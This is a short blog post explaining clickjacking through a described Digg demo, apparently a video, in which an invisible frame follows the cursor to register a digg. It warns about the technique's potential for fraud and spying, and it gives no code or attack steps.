Clickjacking Demo for Digg

If you don’t fully understand how clickjacking works, then you certainly are not alone. Clickjacking actually isn’t that hard for people with Web development experience to implement. Laymen, however, have no need to know what terms such as “UI redressing” and “i frame” mean.

There are plenty of clickjacking demonstrations online that will show you the fundamentals of how clickjacking works. The below demo focuses on a clickjacked page that diggs an article. You’ll notice that the invisible frame follows the mouse cursor on the screen. That’s a dynamic way for cybercriminals to trick Internet users. No matter what you do on that page, you will initiate a cross-site clickjack.

Obviously, no one would fall for this example. It’s intended as a demonstration, not a real example of clickjacking attacks. It is easy to see, however, how easily someone could turn this example into a real clickjacking attack that would draw in thousands and thousands of hits.

It’s also easy to see that clickjacking has applications outside of Digg. You could create clickjacked pages that do just about anything. Some of them purchase items on Amazon.com. Others release scripts that spy on your activities. This is particularly dangerous because hackers can use the information that you send over the Internet to steal your identity or commit credit card fraud. Something as simple as falling for a little trick like this on a website could have long lasting implications that ruin your credit and siphon money away from your bank accounts.

Here’s the demo video that will help you understand how this basic attack works:

 

Advertisements
Explore posts in the same categories: Uncategorized

Tags: , , , , ,

You can comment below, or link to this permanent URL from your own site.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: